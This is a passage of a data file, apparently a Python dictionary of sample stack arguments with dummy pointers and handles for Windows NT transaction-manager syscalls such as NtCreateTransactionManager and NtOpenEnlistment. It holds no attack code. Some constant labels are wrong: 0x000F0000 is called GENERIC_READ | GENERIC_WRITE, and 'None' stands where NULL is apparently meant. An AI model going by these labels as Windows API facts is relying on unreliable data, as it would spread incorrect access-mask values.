\"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (TRANSACTION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE TransactionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateTransactionManager\": {\r\n \"ntFunc\": \"NtCreateTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CommitStrength = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"CreateOptions = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None LogFileName (no log file specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ObjectAttributes (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (TRANSACTIONMANAGER_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE TmHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtEnumerateTransactionObject\": {\r\n \"ntFunc\": \"NtEnumerateTransactionObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ObjectCursorLength = 0x10 (16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ObjectCursor (no cursor structure provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"KTMOBJECT_TYPE = KTMOBJECT_TRANSACTION\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE RootObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtFreezeTransactions\": {\r\n \"ntFunc\": \"NtFreezeTransactions\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ThawTime_Out (no timeout specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None FreezeTime_Out (no timeout specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtGetNotificationResourceManager\": {\r\n \"ntFunc\": \"NtGetNotificationResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"AsynchronousContext = 0 (default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Asynchronous = 0 (synchronous operation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None optional PULONG (no return value requested)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None Time_Out (no timeout specified)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"NotificationLength = 0x1000 (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None TransactionNotification (no notification buffer provided)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenEnlistment\": {\r\n \"ntFunc\": \"NtOpenEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for OBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for LPGUID EnlistmentGuid (optional, commonly None)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"GUID structure representing the enlistment identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None ResourceManagerHandle (commonly invalid or defaulted in examples)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0000\",\r\n \"additionalComment\": \"DesiredAccess (GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE EnlistmentHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenResourceManager\": {\r\n \"ntFunc\": \"NtOpenResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for OBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for LPGUID ResourceManagerGuid (optional, commonly None)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"GUID structure representing the resource manager identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None TmHandle (commonly invalid or defaulted in examples)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0000\",\r\n \"additionalComment\": \"DesiredAccess (GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE ResourceManagerHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenTransaction\": {\r\n \"ntFunc\": \"NtOpenTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None TmHandle (commonly invalid or defaulted in examples)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for LPGUID Uow (optional, commonly None)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"GUID structure representing the unit of work identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for OBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0000\",\r\n \"additionalComment\": \"DesiredAccess (GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to HANDLE TransactionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenTransactionManager\": {\r\n \"ntFunc\": \"NtOpenTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"OpenOptions (commonly 0 for default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for LPGUID TmIdentity (optional, commonly None)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"GUID structure representing the transaction manager identity.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PUNICODE_STRING LogFileName (optional, commonly None)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"UNICODE_STRING structure for log file name.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for OBJECT_ATTRIBUTES (optional, commonly None)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F0000\",\r\n \"additionalComment\": \"DesiredAccess (GENERIC_READ | GENERIC_WRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE TmHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPrepareComplete\": {\r\n \"ntFunc\": \"NtPrepareComplete\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"64-bit integer value representing the virtual clock.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None EnlistmentHandle (commonly invalid or defaulted in examples)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPrepareEnlistment\": {\r\n \"ntFunc\": \"NtPrepareEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional timestamp; commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xdead1000\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPrePrepareComplete\": {\r\n \"ntFunc\": \"NtPrePrepareComplete\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional timestamp; commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xdead2000\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPrePrepareEnlistment\": {\r\n \"ntFunc\": \"NtPrePrepareEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for PLARGE_INTEGER TmVirtualClock (optional, commonly None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional timestamp; commonly None.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xdead3000\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPropagationComplete\": {\r\n \"ntFunc\": \"NtPropagationComplete\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"None pointer for Buffer (optional, commonly None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Optional buffer for propagation data.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BufferLength = 0 (no buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"RequestCookie (dummy value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xdead4000\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPropagationFailed\": {\r\n \"ntFunc\": \"NtPropagationFailed\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xc0000022\",\r\n \"additionalComment\": \"NTSTATUS PropStatus (STATUS_ACCESS_DENIED, dummy error)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"RequestCookie (dummy value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xdead5000\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationEnlistment\": {\r\n \"ntFunc\": \"NtQueryInformationEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"EnlistmentInformationLength (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer for EnlistmentInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0100\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"EnlistmentInformationClass (ENLISTMENT_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationResourceManager\": {\r\n \"ntFunc\": \"NtQueryInformationResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ResourceManagerInformationLength (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to buffer for ResourceManagerInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0110\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ResourceManagerInformationClass (RESOURCEMANAGER_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000bcde\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationTransaction\": {\r\n \"ntFunc\": \"NtQueryInformationTransaction\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"TransactionInformationLength (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to buffer for TransactionInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0120\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TransactionInformationClass (TRANSACTION_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000cdef\",\r\n \"additionalComment\": \"HANDLE TransactionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryInformationTransactionManager\": {\r\n \"ntFunc\": \"NtQueryInformationTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional output)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"TransactionManagerInformationLength (256 bytes, typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to buffer for TransactionManagerInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadd0130\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"TransactionManagerInformationClass (TRANSACTIONMANAGER_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000def0\",\r\n \"additionalComment\": \"HANDLE TransactionManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReadOnlyEnlistment\": {\r\n \"ntFunc\": \"NtReadOnlyEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct51\",\r\n \"structureValueExpectations\": \"64-bit signed integer representing a virtual clock value.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct51\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x01d8e3b5a7c0000\",\r\n \"fieldComment\": \"Sample virtual clock value\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtRecoverEnlistment\": {\r\n \"ntFunc\": \"NtRecoverEnlistment\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"EnlistmentKey (None, commonly unused)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE EnlistmentHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRecoverResourceManager\": {\r\n \"ntFunc\": \"NtRecoverResourceManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000bcde\",\r\n \"additionalComment\": \"HANDLE ResourceManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRecoverTransactionManager\": {\r\n \"ntFunc\": \"NtRecoverTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x0000cdef\",\r\n \"additionalComment\": \"HANDLE TransactionManagerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRegisterProtocolAddressInformation\": {\r\n \"ntFunc\": \"NtRegisterProtocolAddressInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"CreateOptions (example: 1, e.g. RM_PROTOCOL_REGISTER_VOLATILE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ProtocolInformation (dummy pointer, typically a buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xdeadbeef\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ProtocolInformationSize (16 bytes, typical small structure)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ProtocolId (dummy protocol ID value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000bcde\",\r\n \"additionalComment\": \"HANDLE ResourceManager (dummy handle, matches ResourceManagerHandle above)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRenameTransactionManager\": {\r\n \"ntFunc\": \"NtRenameTransactionManager\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to LPGUID ExistingTransactionManagerGuid (dummy pointer)\",\r\n \"structurePointer\": \"GUID\",\r\n \"structureRef\": \"struct52\",\r\n \"structureValueExpectations\": \"A valid GUID structure identifying the existing transaction manager.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING LogFileName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct53\",\r\n \"structureValueExpectations\": \"UNICODE_STRING structure describing the new log file name.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct52\": {\r\n \"type\": \"GUID\",\r\n 